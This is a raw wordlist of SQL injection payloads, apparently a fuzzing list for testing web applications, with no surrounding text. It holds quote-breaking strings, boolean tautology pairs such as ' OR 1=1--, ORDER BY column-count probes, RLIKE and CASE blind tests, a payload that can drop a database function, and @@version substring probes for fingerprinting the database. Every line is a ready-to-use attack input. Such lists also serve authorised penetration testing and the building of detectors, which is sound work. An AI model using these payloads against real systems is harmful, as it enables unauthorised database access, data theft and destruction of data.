'
"
''
'"
;
)
')
")
");
';
";
%'
%"
%')
%")
'))
"))
")))
' OR 1=1
' OR 1=0
' OR x=x
' OR x=y
' OR 1=1#
' OR 1=0#
' OR x=x#
' OR x=y#
' OR 1=1--
' OR 1=0--
' OR x=x--
' OR x=y--
' OR 3409=3409 AND ('pytW' LIKE'pytW
' OR 3409=3409 AND ('pytW' LIKE'pytY
' HAVING 1=1
' HAVING 1=0
' HAVING 1=1#
' HAVING 1=0#
' HAVING 1=1--
' HAVING 1=0--
' AND 1=1
' AND 1=0
' AND 1=1--
' AND 1=0--
' AND 1=1#
' AND 1=0#
' AND 1=1 AND'%'='
' AND 1=0 AND'%'='
' AND 1083=1083 AND (1427=1427
' AND 7506=9091 AND (5913=5913
' AND 1083=1083 AND ('1427=1427
' AND 7506=9091 AND ('5913=5913
' AND 7300=7300 AND 'pKlZ'='pKlZ
' AND 7300=7300 AND 'pKlZ'='pKlY
' AND 7300=7300 AND ('pKlZ'='pKlZ
' AND 7300=7300 AND ('pKlZ'='pKlY
' AS INJECTX WHERE 1=1 AND 1=1
' AS INJECTX WHERE 1=1 AND 1=0
' AS INJECTX WHERE 1=1 AND 1=1#
' AS INJECTX WHERE 1=1 AND 1=0#
' AS INJECTX WHERE 1=1 AND 1=1--
' AS INJECTX WHERE 1=1 AND 1=0--
' WHERE 1=1 AND 1=1
' WHERE 1=1 AND 1=0
' WHERE 1=1 AND 1=1#
' WHERE 1=1 AND 1=0#
' WHERE 1=1 AND 1=1--
' WHERE 1=1 AND 1=0--
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3--
' ORDER BY 4--
' ORDER BY 5--
' ORDER BY 6--
' ORDER BY7--
' ORDER BY8-- 
' ORDER BY9-- 
' ORDER BY10-- 
' ORDER BY11-- 
' ORDER BY12-- 
' ORDER BY13-- 
' ORDER BY14-- 
' ORDER BY15-- 
' ORDER BY16-- 
' ORDER BY17-- 
' ORDER BY18-- 
' ORDER BY19-- 
' ORDER BY20-- 
' ORDER BY21-- 
' ORDER BY22-- 
' ORDER BY23-- 
' ORDER BY24-- 
' ORDER BY25-- 
' ORDER BY26-- 
' ORDER BY27-- 
' ORDER BY28-- 
' ORDER BY29-- 
' ORDER BY30-- 
' ORDER BY31337-- 
' ORDER BY1# 
' ORDER BY2# 
' ORDER BY3# 
' ORDER BY4# 
' ORDER BY5# 
' ORDER BY6# 
' ORDER BY7# 
' ORDER BY8# 
' ORDER BY9# 
' ORDER BY10# 
' ORDER BY11# 
' ORDER BY12# 
' ORDER BY13# 
' ORDER BY14# 
' ORDER BY15# 
' ORDER BY16# 
' ORDER BY17# 
' ORDER BY18# 
' ORDER BY19# 
' ORDER BY20# 
' ORDER BY21# 
' ORDER BY22# 
' ORDER BY23# 
' ORDER BY24# 
' ORDER BY25# 
' ORDER BY26# 
' ORDER BY27# 
' ORDER BY28# 
' ORDER BY29# 
' ORDER BY30#
' ORDER BY31337#
' ORDER BY1 
' ORDER BY2 
' ORDER BY3 
' ORDER BY4 
' ORDER BY5 
' ORDER BY6 
' ORDER BY7 
' ORDER BY8 
' ORDER BY9 
' ORDER BY10 
' ORDER BY11 
' ORDER BY12 
' ORDER BY13 
' ORDER BY14 
' ORDER BY15 
' ORDER BY16 
' ORDER BY17 
' ORDER BY18 
' ORDER BY19 
' ORDER BY20 
' ORDER BY21 
' ORDER BY22 
' ORDER BY23 
' ORDER BY24 
' ORDER BY25 
' ORDER BY26 
' ORDER BY27 
' ORDER BY28 
' ORDER BY29 
' ORDER BY30 
' ORDER BY31337 
' RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
' RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
' IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl--
' IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl--
%' AND 8310=8310 AND '%'='
%' AND 8310=8311 AND '%'='
' and (select substring(@@version,1,1))='X'
' and (select substring(@@version,1,1))='M'
' and (select substring(@@version,2,1))='i'
' and (select substring(@@version,2,1))='y'
' and (select substring(@@version,3,1))='c'
' and (select substring(@@version,3,1))='S'
' and (select substring(@@version,3,1))='X'